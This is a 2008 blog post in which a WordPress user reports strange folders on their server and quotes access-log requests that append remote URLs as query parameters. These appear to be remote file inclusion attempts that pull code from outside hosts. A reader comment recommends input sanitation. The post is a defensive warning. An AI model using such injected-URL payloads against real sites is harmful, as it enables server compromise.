Wordpress Vulnerability?
Lately I’ve been noticing strange folders popping up in my server that I didn’t create. First, there was a folder called "www.asolutionsts.com" and didn’t contain anything but another folder called "sugarcrm" and inside that another called "id4.txt?" I deleted that one and hoped that was the end of it.
Now there’s a new one called "www.emabe.com" with similar empty folders inside of it. This is getting troublesome.
I’m only blaming Wordpress because I’ve checked my access logs and these folders are being created by adding an additional query string to the end of the URL. e.g:
?pag=http://www.asolutionsts.com/sugarcrm/id4.txt?
or
?main=http://www.emabe.com/administrator/...
If you do a search for either of those domains, you’ll see that they are popping up in a lot of access logs.
I’m not sure where this bug is or how it works. It definitely affects the latest version (2.3.2). Maybe I’ll dig around the code and see if I can find anything. All I can suggest is to keep an eye on your servers if you use Wordpress.
[...] Original post by nerdcore [...]
posted on: February 3rd, 2008 at 1:22 pm
Ive seen that pop up on my servers too - in those cases a bit on sanitation goes a long way. I’ve found even something easy like the php command is_numeric goes a long way for stopping that kind of stuff. It’s aggravating.
posted on: February 3rd, 2008 at 11:34 am